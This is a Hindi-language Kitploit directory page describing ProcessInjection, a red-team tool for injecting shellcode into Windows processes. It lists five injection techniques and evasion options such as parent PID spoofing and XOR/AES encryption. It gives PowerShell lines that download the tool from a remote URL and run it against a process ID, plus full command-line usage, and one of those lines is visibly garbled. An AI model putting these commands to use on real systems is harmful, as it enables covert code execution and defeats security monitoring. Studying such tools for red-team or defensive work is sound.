Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ProcessInjection — यह प्रोग्राम विभिन्न प्रोसेस इंजेक्शन तकनीकों का प्रदर्शन करने के लिए डिज़ाइन किया गया है। | Kitploit
उपकरण/GitHubGitHub/3xpl01tc0d3r/processinjection
विशेषाधिकार वृद्धिएन्क्रिप्शन/डिक्रिप्शन उपकरणशोषणआईडीएस/आईपीएस से बचनापोस्ट-शोषणलर्निंग और शिक्षारेड टीमिंगबाइनरी शोषण
GitHub3xpl01tc0d3r/processinjection

ProcessInjection

यह प्रोग्राम विभिन्न प्रोसेस इंजेक्शन तकनीकों का प्रदर्शन करने के लिए डिज़ाइन किया गया है।

रिपॉजिटरी देखें
1.3k19151 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ProcessInjection


यह प्रोग्राम प्रोसेस इंजेक्शन (process injection) करने के लिए डिज़ाइन किया गया है। वर्तमान में यह टूल 5 प्रोसेस इंजेक्शन तकनीकों का समर्थन करता है।

root@kitploit:~
1) Vanilla Process Injection
2) DLL Injection
3) Process Hollowing
4) APC Queue
5) KernelCallbackTable Injection

यह टूल शेलकोड को 4 प्रारूपों में स्वीकार करता है।

root@kitploit:~
1) base64
2) hex
3) c
4) raw

यह टूल प्रोसेस इंजेक्शन करने के लिए 4 विधियों का समर्थन करता है।

root@kitploit:~
1) P/Invoke
2) D/Invoke
3) Direct Syscalls
4) Indirect Syscalls

3 डिटेक्शन चोरी (detection evading) तकनीकों का समर्थन करता है।

root@kitploit:~
1) Parent PID Spoofing

Encryption
2) XOR Encryption (It can also be used with Parent PID Spoofing technique but can't be used with DLL Injection Technique)
3) AES Encryption (It can also be used with Parent PID Spoofing technique but can't be used with DLL Injection Technique)

इसे रिफ्लेक्शन (reflection) के माध्यम से लोड किया जा सकता है।

root@kitploit:~
# Load from the disk
[System.Reflection.Assembly]:https://raw.githubusercontent.com/3xpl01tc0d3r/processinjection/master/:Load(%5BSystem.IO.File%5D::ReadAllBytes(%22ProcessInjection.exe%22))

# Load from a remote server
[System.Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData("http://<URL>/ProcessInjection.exe"))

# Perform process injection
[ProcessInjection.ProcessInjection]::Main(@("/t:1", "/f:base64", "/pid:<ProcessId>", "/sc:<ShellCode>"))

कमांड लाइन उपयोग

root@kitploit:~
Usage           Description
-----           -----------
/t              Specify the process injection technique id.
                1 = Vanilla Process Injection
                2 = DLL Injection
                3 = Process Hollowing
                4 = APC Queue Injection
				5 = KernelCallbackTable Injection
/m              Specify the method to be used
                p = P/Invoke (Default)
                d = D/Invoke
		ds = Direct Syscalls
		ids = Indirect Syscalls
/f              Specify the format of the shellcode.
                base64
                hex
                c
                raw
/pid            Specify the process id.
/parentproc     Specify the parent process name.
/path           Specify the path of the file that contains the shellcode.
/ppath          Specify the path of the executable that will be spawned (Mandatory while using /parentproc argument).
/url            Specify the url where the shellcode is hosted.
/enc            Specify the encryption type (aes or xor) in which the shellcode is encrypted.
/key            Specify the key that will be used to decrypt the shellcode.
/sc             Specify the shellcode directly in base64 or hex format. Note: To pass large shellcode please leverage reflection to run the program.  
/help           Show help

ब्लॉग पोस्ट

https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html

https://3xpl01tc0d3r.blogspot.com/2019/09/process-injection-part-ii.html

https://3xpl01tc0d3r.blogspot.com/2019/10/process-injection-part-iii.html

https://medium.com/@r3n_hat/parent-pid-spoofing-b0b17317168e

https://3xpl01tc0d3r.blogspot.com/2019/12/process-injection-part-v.html

https://3xpl01tc0d3r.blogspot.com/2020/08/process-injection-tool-updates.html

योगदान श्रेय

Renos

श्रेय इसके अलावा भी जाता है:

Aaron Bray और Rasta Mouse को प्रोसेस हॉलोइंग (Process Hollowing) कोड के लिए

The Wover और b33f को डायनामिक इनवोक (Dynamic Invoke) के लिए - (https://thewover.github.io/Dynamic-Invoke/)

टूल डाउनलोड करें